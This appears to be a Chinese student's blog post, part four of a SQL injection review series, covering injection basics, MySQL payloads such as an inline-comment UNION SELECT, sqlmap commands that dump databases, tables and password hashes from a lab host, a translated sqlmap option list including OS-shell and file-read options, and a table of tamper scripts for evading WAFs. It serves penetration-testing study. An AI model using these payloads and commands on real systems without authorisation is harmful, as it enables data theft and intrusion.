Ethan's Blog

SQL注入回顾篇(4)

字数统计: 4.7k阅读时长: 18 min
2019/03/01 Share

前言

忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考,历时两个星期,第一系列SQL注入回顾篇出炉!内容分四节发布,其中SQL注入代码审计为两节,WAF绕过总结为1节,SQLMAP使用总结为1节!此为SQLMAP使用总结部分。欢迎各位斧正,交流!

@[toc]

简介

SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。

Sql注入的产生需要满足以下两个条件:

  1. 参数用户可控:前端传给后端的参数内容是用户可以控制的。
  2. 参数带入数据库查询:传入的参数拼接到sql语句中,且带入数据库查询。

当传入的参数ID为1’时,数据库执行的代码如下所示。

1
Select * from users where id=1

这个语句不符合数据库语法规范,所以会报错。当传入的参数为and 1=1时,执行的sql语句如下所示

1
Select * from users where id=1 and 1=1

因为1=1为真,且where语句中的id=1也为真,所以页面会返回与id=1相同的结果。当传入的id参数为and 1=2时,此时sql语句恒为假,所以服务器会返回与id=1不同的结果

在实际环境中,sql注入会导致数据库的数据泄露,在安全配置不当的情况下还可能会被攻击者拿到系统权限,进行文件的读写操作等。

普通的注入审计,可以通过$_GET,$_POST等传参追踪数据库操作,也可以通过select , delete , update,insert 数据库操作语句反追踪传参。

Mysql注入相关知识点

  1. 在Mysql 5.0版本之后,Mysql默认在数据库中存放一个”information_shcema”的数据库,在该库中,读者需要记住三个表名,分别是SCHEMATA,TABLESCOLUMNS。分存储该用户创建的所有数据库的库名,库名和表名,库名和表名,字段名。

  2. Limit的用法:使用格式为limit m,n,其中m是指记录开始的位置,从0开始,表示第一条记录:n是指取n条记录。例如limit 0,1表示从第一条记录开始,取一条记录。

  3. 需要记住的几个函数

    • database():当前网站使用的数据库。
    • version():当前MYSQL的版本。
    • user():当前MySQL的用户。
  4. 注释符

    在MYSQL中,常见的注释符的表达式为:#--空格/**/

    ,//,-- , --+,,%00,--a

  5. 内联注释

    内联注释的形式:/!code /。内联注释可以用于整个SQL语句中用来执行我们的SQL语句,

    举个栗子:

    1
    Index.php?id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3
  6. MYSQL对大小写不敏感,所以存在大小绕过。


SQLMAP使用与Tamper详解

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)

sqlmap支持五种不同的注入模式:

  1. 基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
  2. 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
  3. 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
  4. 联合查询注入,可以使用union的情况下的注入。
  5. 堆查询注入,可以同时执行多条语句的执行时的注入
常规注入过程
  • 注出数据库
1
sqlmap -u"http://192.168.23.164/sqli/example1.php?name=root" –dbs

在这里插入图片描述

  • 注出指定数据库的表
1
sqlmap -u "http://192.168.23.164/sqli/example1.php?name=root" -D exercises –tables

在这里插入图片描述

  • 注出表中的相关字段
1
sqlmap -u "http://192.168.23.164/sqli/example1.php?name=root" -D exercises -T users –columns

在这里插入图片描述

  • 注出字段值
1
sqlmap -u "http://192.168.23.164/sqli/example1.php?name=root" -D exercises -T users –dump

在这里插入图片描述

权限常用参数
  • -b, –banner 检索数据库管理系统的标识
  • –current-user 检索数据库管理系统当前用户
  • –current-db 检索数据库管理系统当前数据库
  • –is-dba 检测DBMS当前用户是否DBA
  • –users 枚举数据库管理系统用户
  • –passwords 枚举数据库管理系统用户密码哈希
  • –privileges 枚举数据库管理系统用户的权限
  • –roles 枚举数据库管理系统用户的角色
  • –dbs 枚举数据库管理系统数据库
  • –tables 枚举的DBMS数据库中的表
  • –columns 枚举DBMS数据库表列
  • –dump 转储数据库管理系统的数据库中的表项
  • –dump-all 转储所有的DBMS数据库表中的条目
  • –search 搜索列(S),表(S)和/或数据库名称(S)
Cookie注入

当程序有防get注入的时候,可以使用cookie注入

1
sqlmap -u “url” –cookie “id=11” –level 2(只有level达到2才会检测cookie)
从post数据包中注入

可以使用burpsuite或者temperdata等工具来抓取post包

1
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql  指定username参数
从数据库中搜索字段
1
sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password

在dedecms数据库中搜索字段admin或者password

user-agent注入
1
*指定参数 -r *.txt --user-agent "" --technique BEUST --dbms mysql --batch --threads 10
防屏蔽
1
-safe-freq 3 //一个斜杠

sqlmap详细命令:
  • -is-dba 当前用户权限(是否为root权限)
  • -dbs 所有数据库
  • -current-db 网站当前数据库
  • -users 所有数据库用户
  • -current-user 当前数据库用户
  • -random-agent 构造随机user-agent
  • -passwords 数据库密码
  • -proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
  • -time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)

Options(选项):

  • -version 显示程序的版本号并退出
  • -h, –help 显示此帮助消息并退出
  • -v VERBOSE 详细级别:0-6(默认为1)

Target(目标):

以下至少需要设置其中一个选项,设置目标URL。

  • -d DIRECT 直接连接到数据库。
  • -u URL, –url=URL 目标URL。
  • -l LIST 从Burp或WebScarab代理的日志中解析目标。
  • -r REQUESTFILE 从一个文件中载入HTTP请求。
  • -g GOOGLEDORK 处理Google dork的结果作为目标URL。
  • -c CONFIGFILE 从INI配置文件中加载选项。

Request(请求):

这些选项可以用来指定如何连接到目标URL。

  • -data=DATA 通过POST发送的数据字符串
  • -cookie=COOKIE HTTP Cookie头
  • -cookie-urlencode URL 编码生成的cookie注入
  • -drop-set-cookie 忽略响应的Set – Cookie头信息
  • -user-agent=AGENT 指定 HTTP User – Agent头
  • -random-agent 使用随机选定的HTTP User – Agent头
  • -referer=REFERER 指定 HTTP Referer头
  • -headers=HEADERS 换行分开,加入其他的HTTP头
  • -auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
  • -auth-cred=ACRED HTTP身份验证凭据(用户名:密码)
  • -auth-cert=ACERT HTTP认证证书(key_file,cert_file)
  • -proxy=PROXY 使用HTTP代理连接到目标URL
  • -proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码)
  • -ignore-proxy 忽略系统默认的HTTP代理
  • -delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒
  • -timeout=TIMEOUT 等待连接超时的时间(默认为30秒)
  • -retries=RETRIES 连接超时后重新连接的时间(默认3)
  • -scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
  • -safe-url=SAFURL 在测试过程中经常访问的url地址
  • -safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL

Enumeration(枚举):

这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己的SQL语句。

  • -b, –banner 检索数据库管理系统的标识
  • -current-user 检索数据库管理系统当前用户
  • -current-db 检索数据库管理系统当前数据库
  • -is-dba 检测DBMS当前用户是否DBA
  • -users 枚举数据库管理系统用户
  • -passwords 枚举数据库管理系统用户密码哈希
  • -privileges 枚举数据库管理系统用户的权限
  • -roles 枚举数据库管理系统用户的角色
  • -dbs 枚举数据库管理系统数据库
  • -D DBname 要进行枚举的指定数据库名
  • -T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)
  • -tables 枚举的DBMS数据库中的表
  • -columns 枚举DBMS数据库表列
  • -dump 转储数据库管理系统的数据库中的表项
  • -dump-all 转储所有的DBMS数据库表中的条目
  • -search 搜索列(S),表(S)和/或数据库名称(S)
  • -C COL 要进行枚举的数据库列
  • -U USER 用来进行枚举的数据库用户
  • -exclude-sysdbs 枚举表时排除系统数据库
  • -start=LIMITSTART 第一个查询输出进入检索
  • -stop=LIMITSTOP 最后查询的输出进入检索
  • -first=FIRSTCHAR 第一个查询输出字的字符检索
  • -last=LASTCHAR 最后查询的输出字字符检索
  • -sql-query=QUERY 要执行的SQL语句
  • -sql-shell 提示交互式SQL的shell

Optimization(优化):

这些选项可用于优化SqlMap的性能。

  • -o 开启所有优化开关
  • –predict-output 预测常见的查询输出
  • –keep-alive 使用持久的HTTP(S)连接
  • –null-connection 从没有实际的HTTP响应体中检索页面长度
  • –threads=THREADS 最大的HTTP(S)请求并发量(默认为1)

Injection(注入):

这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本。

  • -p TESTPARAMETER 可测试的参数(S)
  • –dbms=DBMS 强制后端的DBMS为此值
  • –os=OS 强制后端的DBMS操作系统为这个值
  • –prefix=PREFIX 注入payload字符串前缀
  • –suffix=SUFFIX 注入payload字符串后缀
  • –tamper=TAMPER 使用给定的脚本(S)篡改注入数据

Detection(检测):

这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。

  • –level=LEVEL 执行测试的等级(1-5,默认为1)
  • –risk=RISK 执行测试的风险(0-3,默认为1)
  • –string=STRING 查询时有效时在页面匹配字符串
  • –regexp=REGEXP 查询时有效时在页面匹配正则表达式
  • –text-only 仅基于在文本内容比较网页

Techniques(技巧):

这些选项可用于调整具体的SQL注入测试。

  • –technique=TECH SQL注入技术测试(默认BEUST)
  • –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
  • –union-cols=UCOLS 定列范围用于测试UNION查询注入
  • –union-char=UCHAR 用于暴力猜解列数的字符

Fingerprint(指纹):

  • -f, –fingerprint 执行检查广泛的DBMS版本指纹

Brute force(蛮力):

这些选项可以被用来运行蛮力检查。

  • –common-tables 检查存在共同表
  • –common-columns 检查存在共同列

User-defined function injection(用户自定义函数注入):

这些选项可以用来创建用户自定义函数。

–udf-inject 注入用户自定义函数

–shared-lib=SHLIB 共享库的本地路径

File system access(访问文件系统):

这些选项可以被用来访问后端数据库管理系统的底层文件系统。

  • –file-read=RFILE 从后端的数据库管理系统文件系统读取文件
  • –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
  • –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

Operating system access(操作系统访问):

这些选项可以用于访问后端数据库管理系统的底层操作系统。

  • –os-cmd=OSCMD 执行操作系统命令
  • –os-shell 交互式的操作系统的shell
  • –os-pwn 获取一个OOB shell,meterpreter或VNC
  • –os-smbrelay 一键获取一个OOB shell,meterpreter或VNC
  • –os-bof 存储过程缓冲区溢出利用
  • –priv-esc 数据库进程用户权限提升
  • –msf-path=MSFPATH Metasploit Framework本地的安装路径
  • –tmp-path=TMPPATH 远程临时文件目录的绝对路径

Windows注册表访问:

这些选项可以被用来访问后端数据库管理系统Windows注册表。

  • –reg-read 读一个Windows注册表项值
  • –reg-add 写一个Windows注册表项值数据
  • –reg-del 删除Windows注册表键值
  • –reg-key=REGKEY Windows注册表键
  • –reg-value=REGVAL Windows注册表项值
  • –reg-data=REGDATA Windows注册表键值数据
  • –reg-type=REGTYPE Windows注册表项值类型
  • 这些选项可以用来设置一些一般的工作参数。
  • -t TRAFFICFILE 记录所有HTTP流量到一个文本文件中
  • -s SESSIONFILE 保存和恢复检索会话文件的所有数据
  • –flush-session 刷新当前目标的会话文件
  • –fresh-queries 忽略在会话文件中存储的查询结果
  • –eta 显示每个输出的预计到达时间
  • –update 更新SqlMap
  • –save file保存选项到INI配置文件
  • –batch 从不询问用户输入,使用所有默认配置。

Miscellaneous(杂项):

  • –beep 发现SQL注入时提醒
  • –check-payload IDS对注入payloads的检测测试
  • –cleanup SqlMap具体的UDF和表清理DBMS
  • –forms 对目标URL的解析和测试形式
  • –gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果
  • –page-rank Google dork结果显示网页排名(PR)
  • –parse-errors 从响应页面解析数据库管理系统的错误消息
  • –replicate 复制转储的数据到一个sqlite3数据库
  • –tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址

  • –wizard 给初级用户的简单向导界面


Tamper详解

当原始注入遇到困难时,可尝试加载相应脚本,进行绕过,说不定会有意外惊喜。在sqlmap的原命令中加入以下代码,即可使用脚本,进行更加强有力的渗透

--tamper“脚本名称”(可使用多个tamper)

sqlmap版本当前为1.2.7.20,共有57个tamper脚本

序号 脚本名称 注释
1 0x2char 将每个编码后的字符转换为等价表达
2 apostrophemask 单引号替换为Utf8字符,用于过滤单引号
3 apostrophenullencode 替换双引号为%00%27
4 appendnullbyte 有效代码后添加%00
5 base64encode 使用base64编码
6 between 比较符替换为between
7 bluecoat 空格替换为随机空白字符,等号替换为like
8 chardoubleencode 双url编码
9 charencode 将url编码(不处理已经编码的字符)
10 charunicodeencode 使用unicode编码
11 charunicodeescape 以指定的payload反向编码未编码的字符
12 commalesslimit 改变limit语句的写法
13 commalessmid 改变mid语句的写法
14 commentbeforeparentheses 在括号前加内联注释
15 concat2concatws 替换CONCAT为CONCAT_WS
16 equaltolike 等号替换为like
17 escapequotes 双引号替换为\\
18 greatest 大于号替换为greatest,绕过对>的过滤
19 halfversionedmorekeywords 在每个关键字前加注释
20 htmlencode html编码所有非字母和数字的字符
21 ifnull2casewhenisnull 改变ifnull语句的写法
22 ifnull2ifisnull 替换ifnull为if(isnull(A))
23 informationschemacomment 标示符后添加注释
24 least 替换大于号为least
25 lowercase 全部替换为小写值
26 modsecurityversioned 空格替换为查询版本的注释
27 modsecurityzeroversioned 添加完整的查询版本的注释
28 multiplespaces 添加多个空格
29 nonrecursivereplacement 替换预定义的关键字
30 overlongutf8 将所有字符转义为utf8
31 overlongutf8more 以指定的payload转换所有字符
32 percentage 每个字符前添加%
33 plus2concat 将加号替换为concat函数
34 plus2fnconcat 将加号替换为ODBC函数{fn CONCAT()}
35 randomcase 字符大小写随机替换
36 randomcomments /**/分割关键字
37 securesphere 添加某字符串
38 sp_password 追加sp_password字符串
39 space2comment 空格替换为/**/
40 space2dash 空格替换为–加随机字符
41 space2hash 空格替换为#加随机字符
42 space2morecomment 空格替换为/_/
43 space2morehash 空格替换为#加随机字符及换行符
44 space2mssqlblank 空格替换为其他空符号
45 space2mssqlhash 空格替换为%23%0A
46 space2mysqlblank 空格替换为其他空白符号
47 space2mysqldash 空格替换为–%0A
48 space2plus 空格替换为加号
49 space2randomblank 空格替换为备选字符集中的随机字符
50 symboliclogical AND和OR替换为&&和\ \
51 unionalltounion union all select替换为union select
52 unmagicquotes 宽字符绕过GPC
53 uppercase 全部替换为大写值
54 varnish 添加HTTP头
55 versionedkeywords 用注释封装每个非函数的关键字
56 versionedmorekeywords 使用注释绕过
57 xforwardedfor 添加伪造的HTTP头

下面以数据库为区分,给出每种数据库可供选择的tamper。若同一脚本适用不同数据库,则在每个数据库中都指出

【MySQL】

版本 可用tamper编号 脚本名称
4/5.0/5.5 1 0x2char
6 between
9 charencode
16 concat2concatws
18 greatest
24 least
25 lowercase
35 randomcase
39 space2comment
49 space2randomblank
53 uppercase
5.1 7 bluecoat
46 space2mysqlblank
5.0/5.5 12 commalesslimit
13 commalessmid
21 ifnull2casewhenisnull
22 ifnull2ifisnull
42 space2morecomment
5.0 15 concat2concatws
26 modsecurityversioned
27 modsecurityzeroversioned
4.0/5.0 41 space2hash
5.1.56 10 charunicodeencode
5.1.56/5.5.11 32 percentage
56 versionedmorekeywords
4.0.18/5.0.22 19 halfversionedmorekeywords
4.0.18/5.1.56/5.5.11 55 versionedkeywords
5.1.41 43 space2morehash
未指定版本 14 commentbeforeparentheses
40 space2dash
45 space2mssqlhash
47 space2mysqldash

【SQLServer】

版本 可用tamper编号 脚本名称
2005/2000 10 charunicodeencode
32 percentage
44 space2mssqlblank
2005 6 between
9 charencode
16 equaltolike
25 lowercase
35 randomcase
39 space2comment
49 space2randomblank
53 uppercase
2002+ 33 plus2concat
2008+ 34 plus2fnconcat
未指定 14 commentbeforeparentheses

Access

版本 可用tamper编号 脚本名称
未指定 4 appendnullbyte

Oracle

版本 可用tamper编号 脚本名称
10g 6 between
9 charencode
14 commentbeforeparentheses
18 greatest
24 least
25 lowercase
35 randomcase
39 space2comment
49 space2randomblank
53 uppercase

PostgreSQL

版本 可用tamper编号 脚本名称
8.3/8.4/9.0 6 between
9 charencode
18 greatest
24 least
25 lowercase
39 space2comment
49 space2randomblank
53 uppercase
9.0 32 percentage
9.0.3 10 charunicodeencode
未指定 14 commentbeforeparentheses
35 randomcase

MSSQL

版本 可用tamper编号 脚本名称
未指定 38 sp_password

SQLite

版本 可用tamper编号 脚本名称
未指定 40 space2dash

未知适用范围

若以上脚本未解决问题,可尝试使用一下脚本。

版本 可用tamper编号 脚本名称
2 apostrophemask
3 apostrophenullencode
5 base64encode
8 chardoubleencode
11 charunicodeescape
17 escapequotes
20 htmlencode
23 informationschemacomment
28 multiplespaces
29 nonrecursivereplacement
30 overlongutf8
31 overlongutf8more
36 randomcomments
37 securesphere
48 space2plus
50 symboliclogical
51 unionalltounion
52 unmagicquotes
54 varnish
57 xforwardedfor

结语

此次新更的内容为SQLMAP使用,单独拿出SQLMAP的原因是开源,经典,强大,兼容数据库!Tamper作为SQLMAP灵魂内容的存在,也希望大家掌握自己开发的能力,以后我也会附上自己的分享!
传送门:
SQL注入回顾篇(一)
SQL注入回顾篇(二)
SQL注入回顾篇(三)

CATALOG
  1. 1. 前言
  • @[toc]
    1. 1. 简介
    2. 2. Mysql注入相关知识点
    3. 3. SQLMAP使用与Tamper详解
      1. 3.1. 常规注入过程
      2. 3.2. 权限常用参数
      3. 3.3. Cookie注入
      4. 3.4. 从post数据包中注入
      5. 3.5. 从数据库中搜索字段
      6. 3.6. user-agent注入
      7. 3.7. 防屏蔽
      8. 3.8. sqlmap详细命令:
      9. 3.9. Tamper详解
    4. 4. 结语